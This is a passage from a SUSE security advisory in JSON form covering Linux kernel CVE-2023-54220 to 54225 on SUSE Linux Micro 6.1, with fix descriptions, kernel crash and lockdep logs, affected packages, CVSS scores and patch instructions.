"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nserial: 8250: Fix oops for port-\u003epm on uart_change_pm()\n\nUnloading a hardware specific 8250 driver can produce error \"Unable to\nhandle kernel paging request at virtual address\" about ten seconds after\nunloading the driver. This happens on uart_hangup() calling\nuart_change_pm().\n\nTurns out commit 04e82793f068 (\"serial: 8250: Reinit port-\u003epm on port\nspecific driver unbind\") was only a partial fix. If the hardware specific\ndriver has initialized port-\u003epm function, we need to clear port-\u003epm too.\nJust reinitializing port-\u003eops does not do this. Otherwise serial8250_pm()\nwill call port-\u003epm() instead of serial8250_do_pm().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54220",
"url": "https://www.suse.com/security/cve/CVE-2023-54220"
},
{
"category": "external",
"summary": "SUSE Bug 1255949 for CVE-2023-54220",
"url": "https://bugzilla.suse.com/1255949"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54220"
},
{
"cve": "CVE-2023-54221",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54221"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nclk: imx93: fix memory leak and missing unwind goto in imx93_clocks_probe\n\nIn function probe(), it returns directly without unregistered hws\nwhen error occurs.\n\nFix this by adding \u0027goto unregister_hws;\u0027 on line 295 and\nline 310.\n\nUse devm_kzalloc() instead of kzalloc() to automatically\nfree the memory using devm_kfree() when error occurs.\n\nReplace of_iomap() with devm_of_iomap() to automatically\nhandle the unused ioremap region and delete \u0027iounmap(anatop_base);\u0027\nin unregister_hws.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54221",
"url": "https://www.suse.com/security/cve/CVE-2023-54221"
},
{
"category": "external",
"summary": "SUSE Bug 1255842 for CVE-2023-54221",
"url": "https://bugzilla.suse.com/1255842"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "low"
}
],
"title": "CVE-2023-54221"
},
{
"cve": "CVE-2023-54223",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54223"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: xsk: Fix invalid buffer access for legacy rq\n\nThe below crash can be encountered when using xdpsock in rx mode for\nlegacy rq: the buffer gets released in the XDP_REDIRECT path, and then\nonce again in the driver. This fix sets the flag to avoid releasing on\nthe driver side.\n\nXSK handling of buffers for legacy rq was relying on the caller to set\nthe skip release flag. But the referenced fix started using fragment\ncounts for pages instead of the skip flag.\n\nCrash log:\n general protection fault, probably for non-canonical address 0xffff8881217e3a: 0000 [#1] SMP\n CPU: 0 PID: 14 Comm: ksoftirqd/0 Not tainted 6.5.0-rc1+ #31\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014\n RIP: 0010:bpf_prog_03b13f331978c78c+0xf/0x28\n Code: ...\n RSP: 0018:ffff88810082fc98 EFLAGS: 00010246\n RAX: 0000000000000000 RBX: ffff888138404901 RCX: c0ffffc900027cbc\n RDX: ffffffffa000b514 RSI: 00ffff8881217e32 RDI: ffff888138404901\n RBP: ffff88810082fc98 R08: 0000000000091100 R09: 0000000000000006\n R10: 0000000000000800 R11: 0000000000000800 R12: ffffc9000027a000\n R13: ffff8881217e2dc0 R14: ffff8881217e2910 R15: ffff8881217e2f00\n FS: 0000000000000000(0000) GS:ffff88852c800000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000564cb2e2cde0 CR3: 000000010e603004 CR4: 0000000000370eb0\n DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n Call Trace:\n \u003cTASK\u003e\n ? die_addr+0x32/0x80\n ? exc_general_protection+0x192/0x390\n ? asm_exc_general_protection+0x22/0x30\n ? 0xffffffffa000b514\n ? bpf_prog_03b13f331978c78c+0xf/0x28\n mlx5e_xdp_handle+0x48/0x670 [mlx5_core]\n ? dev_gro_receive+0x3b5/0x6e0\n mlx5e_xsk_skb_from_cqe_linear+0x6e/0x90 [mlx5_core]\n mlx5e_handle_rx_cqe+0x55/0x100 [mlx5_core]\n mlx5e_poll_rx_cq+0x87/0x6e0 [mlx5_core]\n mlx5e_napi_poll+0x45e/0x6b0 [mlx5_core]\n __napi_poll+0x25/0x1a0\n net_rx_action+0x28a/0x300\n __do_softirq+0xcd/0x279\n ? sort_range+0x20/0x20\n run_ksoftirqd+0x1a/0x20\n smpboot_thread_fn+0xa2/0x130\n kthread+0xc9/0xf0\n ? kthread_complete_and_exit+0x20/0x20\n ret_from_fork+0x1f/0x30\n \u003c/TASK\u003e\n Modules linked in: mlx5_ib mlx5_core rpcrdma rdma_ucm ib_iser libiscsi scsi_transport_iscsi ib_umad rdma_cm ib_ipoib iw_cm ib_cm ib_uverbs ib_core xt_conntrack xt_MASQUERADE nf_conntrack_netlink nfnetlink xt_addrtype iptable_nat nf_nat br_netfilter overlay zram zsmalloc fuse [last unloaded: mlx5_core]\n ---[ end trace 0000000000000000 ]---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54223",
"url": "https://www.suse.com/security/cve/CVE-2023-54223"
},
{
"category": "external",
"summary": "SUSE Bug 1256233 for CVE-2023-54223",
"url": "https://bugzilla.suse.com/1256233"
},
{
"category": "external",
"summary": "SUSE Bug 1256253 for CVE-2023-54223",
"url": "https://bugzilla.suse.com/1256253"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54223"
},
{
"cve": "CVE-2023-54224",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54224"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix lockdep splat and potential deadlock after failure running delayed items\n\nWhen running delayed items we are holding a delayed node\u0027s mutex and then\nwe will attempt to modify a subvolume btree to insert/update/delete the\ndelayed items. However if have an error during the insertions for example,\nbtrfs_insert_delayed_items() may return with a path that has locked extent\nbuffers (a leaf at the very least), and then we attempt to release the\ndelayed node at __btrfs_run_delayed_items(), which requires taking the\ndelayed node\u0027s mutex, causing an ABBA type of deadlock. This was reported\nby syzbot and the lockdep splat is the following:\n\n WARNING: possible circular locking dependency detected\n 6.5.0-rc7-syzkaller-00024-g93f5de5f648d #0 Not tainted\n ------------------------------------------------------\n syz-executor.2/13257 is trying to acquire lock:\n ffff88801835c0c0 (\u0026delayed_node-\u003emutex){+.+.}-{3:3}, at: __btrfs_release_delayed_node+0x9a/0xaa0 fs/btrfs/delayed-inode.c:256\n\n but task is already holding lock:\n ffff88802a5ab8e8 (btrfs-tree-00){++++}-{3:3}, at: __btrfs_tree_lock+0x3c/0x2a0 fs/btrfs/locking.c:198\n\n which lock already depends on the new lock.\n\n the existing dependency chain (in reverse order) is:\n\n -\u003e #1 (btrfs-tree-00){++++}-{3:3}:\n __lock_release kernel/locking/lockdep.c:5475 [inline]\n lock_release+0x36f/0x9d0 kernel/locking/lockdep.c:5781\n up_write+0x79/0x580 kernel/locking/rwsem.c:1625\n btrfs_tree_unlock_rw fs/btrfs/locking.h:189 [inline]\n btrfs_unlock_up_safe+0x179/0x3b0 fs/btrfs/locking.c:239\n search_leaf fs/btrfs/ctree.c:1986 [inline]\n btrfs_search_slot+0x2511/0x2f80 fs/btrfs/ctree.c:2230\n btrfs_insert_empty_items+0x9c/0x180 fs/btrfs/ctree.c:4376\n btrfs_insert_delayed_item fs/btrfs/delayed-inode.c:746 [inline]\n btrfs_insert_delayed_items fs/btrfs/delayed-inode.c:824 [inline]\n __btrfs_commit_inode_delayed_items+0xd24/0x2410 fs/btrfs/delayed-inode.c:1111\n __btrfs_run_delayed_items+0x1db/0x430 fs/btrfs/delayed-inode.c:1153\n flush_space+0x269/0xe70 fs/btrfs/space-info.c:723\n btrfs_async_reclaim_metadata_space+0x106/0x350 fs/btrfs/space-info.c:1078\n process_one_work+0x92c/0x12c0 kernel/workqueue.c:2600\n worker_thread+0xa63/0x1210 kernel/workqueue.c:2751\n kthread+0x2b8/0x350 kernel/kthread.c:389\n ret_from_fork+0x2e/0x60 arch/x86/kernel/process.c:145\n ret_from_fork_asm+0x11/0x20 arch/x86/entry/entry_64.S:304\n\n -\u003e #0 (\u0026delayed_node-\u003emutex){+.+.}-{3:3}:\n check_prev_add kernel/locking/lockdep.c:3142 [inline]\n check_prevs_add kernel/locking/lockdep.c:3261 [inline]\n validate_chain kernel/locking/lockdep.c:3876 [inline]\n __lock_acquire+0x39ff/0x7f70 kernel/locking/lockdep.c:5144\n lock_acquire+0x1e3/0x520 kernel/locking/lockdep.c:5761\n __mutex_lock_common+0x1d8/0x2530 kernel/locking/mutex.c:603\n __mutex_lock kernel/locking/mutex.c:747 [inline]\n mutex_lock_nested+0x1b/0x20 kernel/locking/mutex.c:799\n __btrfs_release_delayed_node+0x9a/0xaa0 fs/btrfs/delayed-inode.c:256\n btrfs_release_delayed_node fs/btrfs/delayed-inode.c:281 [inline]\n __btrfs_run_delayed_items+0x2b5/0x430 fs/btrfs/delayed-inode.c:1156\n btrfs_commit_transaction+0x859/0x2ff0 fs/btrfs/transaction.c:2276\n btrfs_sync_file+0xf56/0x1330 fs/btrfs/file.c:1988\n vfs_fsync_range fs/sync.c:188 [inline]\n vfs_fsync fs/sync.c:202 [inline]\n do_fsync fs/sync.c:212 [inline]\n __do_sys_fsync fs/sync.c:220 [inline]\n __se_sys_fsync fs/sync.c:218 [inline]\n __x64_sys_fsync+0x196/0x1e0 fs/sync.c:218\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\n other info that\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54224",
"url": "https://www.suse.com/security/cve/CVE-2023-54224"
},
{
"category": "external",
"summary": "SUSE Bug 1255951 for CVE-2023-54224",
"url": "https://bugzilla.suse.com/1255951"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54224"
},
{
"cve": "CVE-2023-54225",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54225"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ipa: only reset hashed tables when supported\n\nLast year, the code that manages GSI channel transactions switched\nfrom using spinlock-protected linked lists to using indexes into the\nring buffer used for a channel. Recently, Google reported seeing\ntransaction reference count underflows occasionally during shutdown.\n\nDoug Anderson found a way to reproduce the issue reliably, and\nbisected the issue to the commit that eliminated the linked lists\nand the lock. The root cause was ultimately determined to be\nrelated to unused transactions being committed as part of the modem\nshutdown cleanup activity. Unused transactions are not normally\nexpected (except in error cases).\n\nThe modem uses some ranges of IPA-resident memory, and whenever it\nshuts down we zero those ranges. In ipa_filter_reset_table() a\ntransaction is allocated to zero modem filter table entries. If\nhashing is not supported, hashed table memory should not be zeroed.\nBut currently nothing prevents that, and the result is an unused\ntransaction. 